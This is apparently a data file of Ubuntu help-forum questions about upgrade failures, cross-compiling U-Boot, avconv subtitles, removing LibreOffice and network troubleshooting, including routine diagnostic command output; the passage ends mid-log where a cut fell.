515178	problems with 12.04 lts to 14.04 lts upgrade	i decided to upgrade from 12.04 lts to 14.04 lts . i used do-release-upgrade . everything worked . when i run lsb_release -a i get : description : ubuntu 14.04.1 lts release : 14.04 codename : trusty i think at this moment , the upgrade is a success . but , i have these problems : 1- there 's a loop when i try to login to my desktop session . cat ~/.xsession-errors gave me : unable to get name `` org.gnome.zeitgeist.datahub '' on the bus ! on lightdm i still see ubuntu 12.04 lts 2- i can not install anything that could help me solve the problem qbove . when i run apt-get -f install i get : ... the following extra packages will be installed : ubuntu-release-upgrader-core the following new packages will be installed : ubuntu-release-upgrader-core ... e : could not open file descriptor -1 ... e : sub-process /usr/bin/dpkg returned an error code ( 1 ) when i try apt-get upgrade , it asks me at the end to run apt-get -f install . ( how ) can this be fixed ?
515181	when building u-boot /bin/bash : arm-none-linux-gnueabi-gcc : command not found	i am currently running ubuntu 12.0.4 on a 64 bit machine . i have an am335x development board . along with the kit came the compressed kernel ( linux 3,2 ) , rootfs , u-boot , and arm cross compiler ( arm-2010q1 ) . i uncompressed everything to a sub folder ( /home/brent/work ) . i have added the following to my .bashrc file : path=/home/brent/work/arm-2010q1/bin : $ path cross_compile=arm-none-linux-gnueabi- i have also installed the following : sudo apt-get install ia32-libs when i go to built u-boot i am doing the following ( per instructions that came with the kit ) : brent @ brent~/work/u-boot $ sudo make distclean awk ' ( nf & & $ 1 ! ~ /^ # / ) { print $ 1 `` : `` $ 1 `` _config ; $ ( make ) '' } ' boards.cfg > .boards.depend brent @ brent~/work/u-boot $ sudo make myd_am335x_lcd4.3_config awk ' ( nf & & $ 1 ! ~ /^ # / ) { print $ 1 `` : `` $ 1 `` _config ; $ ( make ) '' } ' boards.cfg > .boards.depend configuring for myd_am335x_lcd4.3 - board : myd_am335x , options : display_lcd43 brent @ brent~/work/u-boot $ sudo make /bin/bash : arm-none-linux-gnueabi-gcc : command not found /bin/bash : arm-none-linux-gnueabi-gcc : command not found dirname : missing operand try `dirname -- help ' for more information . generating include/autoconf.mk /bin/bash : line 3 : arm-none-linux-gnueabi-gcc : command not found /bin/bash : arm-none-linux-gnueabi-gcc : command not found dirname : missing operand try `dirname -- help ' for more information . generating include/autoconf.mk.dep /bin/bash : line 3 : arm-none-linux-gnueabi-gcc : command not found /bin/bash : arm-none-linux-gnueabi-gcc : command not found /bin/bash : arm-none-linux-gnueabi-gcc : command not found dirname : missing operand try `dirname -- help ' for more information . /bin/bash : arm-none-linux-gnueabi-gcc : command not found /bin/bash : arm-none-linux-gnueabi-ld : command not found /bin/bash : arm-none-linux-gnueabi-gcc : command not found dirname : missing operand try `dirname -- help ' for more information . /bin/bash : arm-none-linux-gnueabi-gcc : command not found dirname : missing operand try `dirname -- help ' for more information . arm-none-linux-gnueabi-gcc -ddo_deps_only \ -g -os -fno-common -ffixed-r8 -msoft-float -d__kernel__ -i/home/brent/cropventures/u-boot/include -fno-builtin -ffreestanding -nostdinc -isystem -pipe -dconfig_arm -d__arm__ -march=armv5 -wall -wstrict-prototypes \ -o lib/asm-offsets.s lib/asm-offsets.c -c -s /bin/bash : arm-none-linux-gnueabi-gcc : command not found make : *** [ lib/asm-offsets.s ] error 127 i have verified the binary is located at /home/brent/work/arm-2010q1/bin i am also not sure why i need to have sudo as part of the command ? if i do not i get a permissions error . any help or information on what i am doing wrong would be greatly appreciated .
515183	will ubuntu ever be able to natively run windows applications ?	i want to know if there is ever going to be a possibility that windows exe files will be able to run on linux without an emulator like wine . is there some way of creating an api library that offers both those used by windows applications as well as those used by linux ones ? what is preventing this from happening or why has it not happened yet ? wine seems to be able to run them without running a full install of windows , so while there may be some proprietary bits why ca n't there be a way of completely integrating it ?
515184	microsoft sculpt comfort mouse does n't work on ubuntu 14.04.1 lts	i just bought this new microsoft sculpt comfort mouse but ubuntu ca n't find it from the bluetooth settings . i installed blueman , but nothing happen . any ideas ?
515185	run several xdotool commands in one line separated from each other	i 'm trying to run xdotool type word then xdotool key return from startup aplications preferences . but if i use & & or ; , xdotool evaluates it as continuation of input .
515187	partition recovery of windows after ubuntu install	i have perform clean install of ubuntu on windows 8 . my partition i can not find , please dont say it is deleted , i had vital data on those drives , please help .
515188	ca n't remove libre office ubuntu 14.04 ?	i have libre office installed on ubuntu 14.04 and i would like to remove it but even though it say 's it is uninstalled it still works , exists , and most importantly of all takes up my disk space . i have tried to uninstall it by command line but it says `` not installed so not removing '' and it does not appear in the ubuntu software center so i cant remove it there either . i also tried uninstalling it by clicking the menu option in dash but that does not do anything either . i was wondering if any one knows how to remove libre office ? if at all possible that is . this is the resault to guru 's command : package 'libreoffice-ogltrans ' is not installed , so not removed package 'libreoffice-pdfimport ' is not installed , so not removed package 'libreoffice-presentation-minimizer ' is not installed , so not removed package 'libreoffice-sdbc-firebird ' is not installed , so not removed package 'libreoffice-sdbc-hsqldb ' is not installed , so not removed package 'libreoffice-style-human ' is not installed , so not removed package 'libreoffice-style-tango ' is not installed , so not removed package 'libreoffice-writer ' is not installed , so not removed package 'browser-plugin-libreoffice ' is not installed , so not removed package 'libreoffice ' is not installed , so not removed package 'libreoffice-emailmerge ' is not installed , so not removed package 'libreoffice-gtk3 ' is not installed , so not removed package 'libreoffice-kde ' is not installed , so not removed package 'libreoffice-librelogo ' is not installed , so not removed package 'libreoffice-mysql-connector ' is not installed , so not removed package 'libreoffice-presenter-console ' is not installed , so not removed package 'libreoffice-report-builder ' is not installed , so not removed package 'libreoffice-report-builder-bin ' is not installed , so not removed package 'libreoffice-script-provider-bsh ' is not installed , so not removed package 'libreoffice-script-provider-js ' is not installed , so not removed package 'libreoffice-script-provider-python ' is not installed , so not removed package 'libreoffice-sdbc-postgresql ' is not installed , so not removed package 'libreoffice-style-crystal ' is not installed , so not removed package 'libreoffice-style-galaxy ' is not installed , so not removed package 'libreoffice-style-hicontrast ' is not installed , so not removed package 'libreoffice-style-oxygen ' is not installed , so not removed package 'libreoffice-style-sifr ' is not installed , so not removed package 'libreoffice-subsequentcheckbase ' is not installed , so not removed package 'libreoffice-wiki-publisher ' is not installed , so not removed the following packages were automatically installed and are no longer required : fonts-opensymbol libboost-date-time1.54.0 libclucene-contribs1 libclucene-core1 libcmis-0.4-4 libcolamd2.8.0 libexttextcat-2.0-0 libexttextcat-data libhyphen0 liblangtag-common liblangtag1 libmhash2 libmythes-1.2-0 libneon27-gnutls libraptor2-0 librasqal3 librdf0 libyajl2 lp-solve uno-libs3 ure xfonts-mathml use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . i had to trim some as the post was to large besides it was just a bunch of is not installed , so not removed anyway . update i do n't know exactly what just happened but i tried to open libre office again and i got a black screen with white writing that printed out a bunch of numbers and at the bottom it said `` kernel panic - fatal exception '' and i had to restart manually but after that libre office seems to be gone so that 's good i guess .
515192	sometimes shortcut keys stop working	since i started using the xfce desktop enviroment , there are time when keyboard shortcuts stop working and the only way to make them work again is by restarting my laptop . anyone know about this problem and if it is a fixable problem ? i have searched around for the solution for this problem but have not found anything that has helped me . thanks in advance !
515196	14.04lts microphone buzzing noise bad	my microphone started acting up badly this morning has a loud buzz , it has got to be software it was working fine last night installed updates and shutdown last night and boom here we are , oh and i have a microphone jack microphone and a internal mic , both are acting up ... please help please help i need to use skype . dafull97
515197	howto overlay subtitles onto video using avconv ?	i am using the following script to overlay a dvdsub stream and a video stream ; avconv -i input.mkv -i subtitles.sub -filter_complex `` [ 0 : v:0 ] [ 1 : s:0 ] overlay [ vid ] '' -map `` [ vid ] '' -s hd720 -sws_flags lanczos -vcodec libx264 -crf 20 -preset medium ~/desktop/test.mkv i get the following error ; stream specifier ' : s:0 ' in filtergraph description [ 0 : v:0 ] [ 1 : s:0 ] overlay [ vid ] matches no streams . no matter what i do i just can not get this to work . can any one tell me how to 'burn-in ' subtitles using avconv ( or ffmpeg ) ?
515198	how to run terminal as root ?	when we want to run a programs as root we use sudo , gksu , gksudo and etc . now my question is how do we can run a terminal as the root user in terminal ? i tried with using gksudo terminal and gksu terminal but nothing happens . and by running sudo terminal i get error sudo : terminal : command not found .
515199	install script question	sorry if this has been discussed , was n't sure what to use to search for the particular question i had . i 'm installing sickrage and couchpotato and headphones , and will be doing multiple installs i made a small batch script just to install everything but what i do n't know how to do is automatically make them auto start on boot . since they all require a file to be created i do not know how to make this file auto create and populate what needs to be put into it .
515200	how to add different keyring password for google chrome only in ubuntu	google chrome saves password in gnome keyring and i want to secure it with different password instead of log in password . in passwords and keys application , there is a folder named login which contains password from chrome and other application . how can i change the password ( keyring ) only for chrome without hampering other application . i want that google chrome ask for keyring password when it load .
515204	internet issues	i recently updated the system and now am unable to connect to the internet via wifi or cable . i suppose i should clarify that while it recognizes the connections it does not connect to the web . all other connectivity is fine . all other devices wired and wifi within my home are fine and absolutely nothing has changed with my network settings whatsoever . p.s . i do have the infamous broadcom card in a dell inspiron . i 've also booted to all previous kernels and still nothing . billy @ billylaptop : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:1c:23:89:46:5f up broadcast multicast mtu:1500 metric:1 rx packets:47 errors:0 dropped:0 overruns:0 frame:0 tx packets:48 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:7200 ( 7.2 kb ) tx bytes:8654 ( 8.6 kb ) interrupt:21 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:2672 errors:0 dropped:0 overruns:0 frame:0 tx packets:2672 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:233285 ( 233.2 kb ) tx bytes:233285 ( 233.2 kb ) wlan0 link encap : ethernet hwaddr 00:1c:26:3a:65 : aa inet addr:192.168.11.5 bcast:192.168.11.255 mask:255.255.255.0 inet6 addr : fe80 : :21c:26ff : fe3a:65aa/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:2789 errors:0 dropped:0 overruns:0 frame:0 tx packets:180 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:365198 ( 365.1 kb ) tx bytes:32067 ( 32.0 kb ) billy @ billylaptop : ~ $ route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.11.1 0.0.0.0 ug 0 0 0 wlan0 192.168.11.0 0.0.0.0 255.255.255.0 u 9 0 0 wlan0 billy @ billylaptop : ~ $ nmcli dev list iface wlan0 general.device : wlan0 general.type : 802-11-wireless general.vendor : broadcom corporation general.product : wireless 1390 wlan mini-card general.driver : b43 general.driver-version : 3.13.0-32-generic general.firmware-version : n/a general.hwaddr : 00:1c:26:3a:65 : aa general.state : 100 ( connected ) general.reason : 0 ( no reason given ) general.udi : /sys/devices/pci0000:00/0000:00:05.0/0000:0b:00.0/ssb0:0/net/wlan0 general.ip-iface : wlan0 general.nm-managed : yes general.autoconnect : yes general.firmware-missing : no general.connection : /org/freedesktop/networkmanager/activeconnection/2 capabilities.carrier-detect : no capabilities.speed : 48 mb/s connections.available-connection-paths : /org/freedesktop/networkmanager/settings/ { 0 } connections.available-connections [ 1 ] : 58555ac2-5665-41c6-98db-633d44173cb7 | harperbentley wifi-properties.wep : yes wifi-properties.wpa : yes wifi-properties.wpa2 : yes wifi-properties.tkip : yes wifi-properties.ccmp : yes wifi-properties.ap : yes wifi-properties.adhoc : yes ap [ 1 ] .ssid : 'tg862g12 ' ap [ 1 ] .bssid : 14 : ab : f0:31 : d1:10 ap [ 1 ] .mode : infrastructure ap [ 1 ] .freq : 2462 mhz ap [ 1 ] .rate : 54 mb/s ap [ 1 ] .signal : 50 ap [ 1 ] .security : wpa2 ap [ 1 ] .active : no ap [ 2 ] .ssid : '2wire322 ' ap [ 2 ] .bssid : b8 : e6:25:26:7a:51 ap [ 2 ] .mode : infrastructure ap [ 2 ] .freq : 2457 mhz ap [ 2 ] .rate : 54 mb/s ap [ 2 ] .signal : 60 ap [ 2 ] .security : wpa wpa2 ap [ 2 ] .active : no ap [ 3 ] .ssid : 'harperbentley ' ap [ 3 ] .bssid : 00:24 : a5:34:98:19 ap [ 3 ] .mode : infrastructure ap [ 3 ] .freq : 2412 mhz ap [ 3 ] .rate : 54 mb/s ap [ 3 ] .signal : 78 ap [ 3 ] .security : wpa wpa2 ap [ 3 ] .active : yes ip4.address [ 1 ] : ip = 192.168.11.5/24 , gw = 192.168.11.1 ip4.dns [ 1 ] : 192.168.11.1 ip4.domain [ 1 ] : satx.rr.com dhcp4.option [ 1 ] : domain_name = satx.rr.com dhcp4.option [ 2 ] : expiry = 1408997236 dhcp4.option [ 3 ] : broadcast_address = 192.168.11.255 dhcp4.option [ 4 ] : dhcp_message_type = 5 dhcp4.option [ 5 ] : dhcp_lease_time = 172800 dhcp4.option [ 6 ] : ip_address = 192.168.11.5 dhcp4.option [ 7 ] : routers = 192.168.11.1 dhcp4.option [ 8 ] : subnet_mask = 255.255.255.0 dhcp4.option [ 9 ] : domain_name_servers = 192.168.11.1 dhcp4.option [ 10 ] : network_number = 192.168.11.0 dhcp4.option [ 11 ] : dhcp_server_identifier = 192.168.11.1 thank you immensely for any and all your help .
515206	ubuntu boot slow - late drive access	so i just installed ubuntu on a brand new samsung 840 pro ssd and have noticed that it is slower than expected . the led access light does n't start blinking until after 20 seconds or so have passed , after which the boot up seems to actually start . does anyone have any ideas as to why this is happening ? i have windows 7 installed on a separate ssd and use windows loader as the main loader . windows loader points to grub2 , from which i then start ubuntu up . the 20 seconds count that i mentioned earlier starts after i select ubuntu 14.04.1 from the grub2 menu . any help is appreciated . edit : i forgot to mention that i have only one partition for / and /home . i intend on using a shared ntfs drive for my documents and other personal files , so i had no need for the /home . i did not make a /swap since i have 12 gb of ram . i also did not make a /boot since i was told that it 's not really necessary in my case .
515207	xubuntu dual monitor broke display	after i used settings > display to enable my second monitor , my first display is not working anymore either . so i enabled both , then clicked save configuration since it was working and boom it crashed . now when i start up , i can see the screen which i type my password but it goes black after that ! when i boot into recovery mode it works fine but in settings > display i do n't see hdmi at all to disable it . is there anyway to restore all display setting to default ? ( i can ctrl+alt+f1 and type commands but xrandr returns no results over there ) edit i should clarify that system bios is set to laptop display
515208	xubuntu 14.04 add splash screen	i want to get some splash screens of my own . i am installing them from http : //www.gnome-look.org/ i have no idea how to add them to the menu so that i can set it as a splash screen . i just know that i get a tar.gz file . where do i put the file ?
515212	need help with download/installation ubuntu 14.04.1	i have downloaded ubuntu 14.04.1 but when i try to run the installation i keep getting the below error message could not retrieve the required installation files . for more information , please see the log file : c : \users\prise\appdata\local\temp\wubi-14.04-rev286.log . i will be glad to get your help .
515215	12.04lts : no network internet	friends -- can not connect reliably to ethernet nor at all to internet : symptoms : about 2 weeks ago did an upgrade . have not been able to connect to ethernet nor internet . today , for example , boot up this system76 laptop and there was no network connection . did sudo mount -a and got some internal network connectivity : doug @ ubuntu : /sam $ ping earth ping earth ( 192.168.0.201 ) 56 ( 84 ) bytes of data . 64 bytes from earth ( 192.168.0.201 ) : icmp_req=1 ttl=64 time=0.160 ms 64 bytes from earth ( 192.168.0.201 ) : icmp_req=2 ttl=64 time=0.177 ms 64 bytes from earth ( 192.168.0.201 ) : icmp_req=3 ttl=64 time=0.159 ms ^c -- - earth ping statistics -- - 3 packets transmitted , 3 received , 0 % packet loss , time 1998ms rtt min/avg/max/mdev = 0.159/0.165/0.177/0.013 ms doug @ ubuntu : /sam $ ping doug2 ping doug ( 192.168.0.4 ) 56 ( 84 ) bytes of data . ^c -- - doug ping statistics -- - 3 packets transmitted , 0 received , 100 % packet loss , time 1999ms doug @ ubuntu : /sam $ ping sharon ping sharon ( 192.168.0.111 ) 56 ( 84 ) bytes of data . 64 bytes from sharon ( 192.168.0.111 ) : icmp_req=1 ttl=128 time=0.276 ms ^c -- - sharon ping statistics -- - 6 packets transmitted , 1 received , 83 % packet loss , time 5031ms rtt min/avg/max/mdev = 0.276/0.276/0.276/0.000 ms doug @ ubuntu : /sam $ ping 192.168.0.1 ping 192.168.0.1 ( 192.168.0.1 ) 56 ( 84 ) bytes of data . ^c -- - 192.168.0.1 ping statistics -- - 6 packets transmitted , 0 received , 100 % packet loss , time 4999ms doug @ ubuntu : /sam $ ping earth ping earth ( 192.168.0.201 ) 56 ( 84 ) bytes of data . ^c -- - earth ping statistics -- - 5 packets transmitted , 0 received , 100 % packet loss , time 4032ms doug @ ubuntu : /sam $ ping yahoo.com ping : unknown host yahoo.com doug @ ubuntu : /sam $ ping ubuntu.com ping : unknown host ubuntu.com doug @ ubuntu : /sam $ ping 8.8.8.8 ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . ^c -- - 8.8.8.8 ping statistics -- - 14 packets transmitted , 0 received , 100 % packet loss , time 13103ms note that earth is the cifs server , and one time pinging it worked , later failed . clues : doug @ ubuntu : /sam $ grep -i eth /var/log/syslog |tail aug 23 15:32:46 ubuntu kernel : [ 5328.070401 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.1 dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 aug 23 15:32:48 ubuntu kernel : [ 5330.651139 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.5 dst=224.0.0.251 len=32 tos=0x00 prec=0x00 ttl=1 id=19090 proto=2 aug 23 15:34:51 ubuntu kernel : [ 5453.072279 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.1 dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 aug 23 15:34:55 ubuntu kernel : [ 5457.085433 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.10 dst=224.0.0.251 len=32 tos=0x00 prec=0x00 ttl=1 id=16137 proto=2 aug 23 15:36:56 ubuntu kernel : [ 5578.074492 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.1 dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 aug 23 15:37:00 ubuntu kernel : [ 5582.359006 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.10 dst=224.0.0.251 len=32 tos=0x00 prec=0x00 ttl=1 id=16150 proto=2 aug 23 15:39:01 ubuntu kernel : [ 5703.074410 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.1 dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 aug 23 15:39:03 ubuntu kernel : [ 5705.070122 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.10 dst=224.0.0.251 len=32 tos=0x00 prec=0x00 ttl=1 id=16163 proto=2 aug 23 15:41:06 ubuntu kernel : [ 5828.074387 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.1 dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 aug 23 15:41:13 ubuntu kernel : [ 5835.319941 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.5 dst=224.0.0.251 len=32 tos=0x00 prec=0x00 ttl=1 id=23298 proto=2 doug @ ubuntu : /sam $ ifconfig -a eth0 link encap : ethernet hwaddr [ blanked ] inet addr:192.168.0.7 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :21b : fcff : fe29:9dfc/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:3961 errors:0 dropped:0 overruns:0 frame:0 tx packets:2007 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:991204 ( 991.2 kb ) tx bytes:252908 ( 252.9 kb ) interrupt:16 base address:0xec00 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:2190 errors:0 dropped:0 overruns:0 frame:0 tx packets:2190 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:168052 ( 168.0 kb ) tx bytes:168052 ( 168.0 kb ) wlan0 link encap : ethernet hwaddr 00:19 : d2:72:5a:0c up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) doug @ ubuntu : /sam $ iwconfig lo no wireless extensions . wlan0 ieee 802.11abg essid : off/any mode : managed access point : not-associated tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off eth0 no wireless extensions . doug @ ubuntu : /sam $ lsmod module size used by des_generic 21191 0 md4 12523 0 nls_iso8859_1 12617 1 nls_cp437 12751 1 vfat 17308 1 fat 55605 1 vfat usb_storage 39646 1 dm_crypt 22528 1 joydev 17393 0 snd_hda_codec_analog 75395 1 snd_hda_intel 32719 2 pcmcia 39826 0 snd_hda_codec 109562 2 snd_hda_codec_analog , snd_hda_intel snd_hwdep 13276 1 snd_hda_codec ip6t_log 16846 4 xt_hl 12465 6 ip6t_rt 12473 3 snd_pcm 80916 2 snd_hda_intel , snd_hda_codec nf_conntrack_ipv6 13581 7 nf_defrag_ipv6 13175 1 nf_conntrack_ipv6 ipt_reject 12512 1 ipt_log 12783 5 xt_limit 12541 12 xt_tcpudp 12531 21 xt_addrtype 12596 4 snd_seq_midi 13132 0 xt_state 12514 14 ip6table_filter 12711 1 ip6_tables 22528 3 ip6t_log , ip6t_rt , ip6table_filter nf_conntrack_netbios_ns 12585 0 nf_conntrack_broadcast 12541 1 nf_conntrack_netbios_ns nf_nat_ftp 12595 0 nf_nat 24959 1 nf_nat_ftp nf_conntrack_ipv4 19084 9 nf_nat nf_defrag_ipv4 12649 1 nf_conntrack_ipv4 nf_conntrack_ftp 13183 1 nf_nat_ftp nf_conntrack 73847 8 nf_conntrack_ipv6 , xt_state , nf_conntrack_netbios_ns , nf_conntrack_broadcast , nf_nat_ftp , nf_nat , nf_conntrack_ipv4 , nf_conntrack_ftp iptable_filter 12706 1 ip_tables 18106 1 iptable_filter snd_rawmidi 25424 1 snd_seq_midi psmouse 86982 0 x_tables 22011 13 ip6t_log , xt_hl , ip6t_rt , ipt_reject , ipt_log , xt_limit , xt_tcpudp , xt_addrtype , xt_state , ip6table_filter , ip6_tables , iptable_filter , ip_tables arc4 12473 2 r592 17808 0 snd_seq_midi_event 14475 1 snd_seq_midi memstick 15857 1 r592 yenta_socket 27465 0 serio_raw 13027 0 pcmcia_rsrc 18367 1 yenta_socket iwl3945 73186 0 pcmcia_core 21511 3 pcmcia , yenta_socket , pcmcia_rsrc iwl_legacy 71334 1 iwl3945 snd_seq 51592 2 snd_seq_midi , snd_seq_midi_event mac80211 436493 2 iwl3945 , iwl_legacy snd_timer 28931 2 snd_pcm , snd_seq snd_seq_device 14172 3 snd_seq_midi , snd_rawmidi , snd_seq rfcomm 38139 0 bnep 17830 2 parport_pc 32114 0 bluetooth 158447 10 rfcomm , bnep ppdev 12849 0 cfg80211 178877 3 iwl3945 , iwl_legacy , mac80211 asus_laptop 23693 0 sparse_keymap 13658 1 asus_laptop input_polldev 13648 1 asus_laptop nls_utf8 12493 6 cifs 258037 10 snd 62218 13 snd_hda_codec_analog , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device soundcore 14635 1 snd mac_hid 13077 0 snd_page_alloc 14108 2 snd_hda_intel , snd_pcm lp 17455 0 parport 40930 3 parport_pc , ppdev , lp i915 428418 3 firewire_ohci 40172 0 sdhci_pci 18324 0 sdhci 28241 1 sdhci_pci firewire_core 56940 1 firewire_ohci crc_itu_t 12627 1 firewire_core r8169 56396 0 drm_kms_helper 45466 1 i915 drm 197641 4 i915 , drm_kms_helper i2c_algo_bit 13199 1 i915 video 19115 1 i915 doug @ ubuntu : /sam $ dmesg |grep eth [ 0.116936 ] i2c-core : driver [ aat2870 ] using legacy suspend method [ 0.116939 ] i2c-core : driver [ aat2870 ] using legacy resume method [ 1.453811 ] r8169 0000:03:07.0 : eth0 : rtl8169sb/8110sb at 0xf840ec00 , [ blanked ] , xid 10000000 irq 16 [ 1.453815 ] r8169 0000:03:07.0 : eth0 : jumbo features [ frames : 7152 bytes , tx checksumming : ok ] [ 25.681231 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 154.037318 ] r8169 0000:03:07.0 : eth0 : link down [ 154.037329 ] r8169 0000:03:07.0 : eth0 : link down [ 154.037596 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 155.583162 ] r8169 0000:03:07.0 : eth0 : link up [ 155.583366 ] addrconf ( netdev_change ) : eth0 : link becomes ready [ 156.637048 ] r8169 0000:03:07.0 : eth0 : link down [ 156.637066 ] r8169 0000:03:07.0 : eth0 : link down [ 156.637339 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 156.773699 ] r8169 0000:03:07.0 : eth0 : link down [ 156.773983 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 158.456181 ] r8169 0000:03:07.0 : eth0 : link up [ 158.456378 ] addrconf ( netdev_change ) : eth0 : link becomes ready [ 159.364468 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.1 dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 [ 162.384496 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.5 dst=224.0.0.251 len=32 tos=0x00 prec=0x00 ttl=1 id=38877 proto=2 [ 166.272457 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.1 dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 [ 166.422333 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.5 dst=224.0.0.251 len=32 tos=0x00 prec=0x00 ttl=1 id=40695 proto=2 [ 168.736049 ] eth0 : no ipv6 routers present [ 183.572472 ] r8169 0000:03:07.0 : eth0 : link down [ 183.572490 ] r8169 0000:03:07.0 : eth0 : link down [ 183.572934 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 185.204801 ] r8169 0000:03:07.0 : eth0 : link up [ 185.205005 ] addrconf ( netdev_change ) : eth0 : link becomes ready [ 3620.680451 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.1 dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 [ 3621.068431 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.1 dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 [ 3624.912973 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.5 dst=224.0.0.251 len=32 tos=0x00 prec=0x00 ttl=1 id=9118 proto=2 [ 3631.088069 ] eth0 : no ipv6 routers present [ 3703.062980 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.1 dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 [ 3703.465330 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.5 dst=224.0.0.251 len=32 tos=0x00 prec=0x00 ttl=1 id=9210 proto=2 [ 3828.062951 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.1 dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 [ 3833.617772 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.5 dst=224.0.0.251 len=32 tos=0x00 prec=0x00 ttl=1 id=9749 proto=2 [ 3953.062920 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.1 dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 [ 3955.675129 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.10 dst=224.0.0.251 len=32 tos=0x00 prec=0x00 ttl=1 id=15983 proto=2 [ 4078.062922 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.1 dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 [ 4078.386319 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.10 dst=224.0.0.251 len=32 tos=0x00 prec=0x00 ttl=1 id=15997 proto=2 [ 4203.062899 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.1 dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 [ 4203.559241 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.10 dst=224.0.0.251 len=32 tos=0x00 prec=0x00 ttl=1 id=16011 proto=2 [ 4328.062833 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.1 dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 [ 4328.930922 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.10 dst=224.0.0.251 len=32 tos=0x00 prec=0x00 ttl=1 id=16027 proto=2 [ 4453.062811 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.1 dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 [ 4453.950224 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.10 dst=224.0.0.251 len=32 tos=0x00 prec=0x00 ttl=1 id=16039 proto=2 [ 4578.062742 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.1 dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 [ 4580.626432 ] 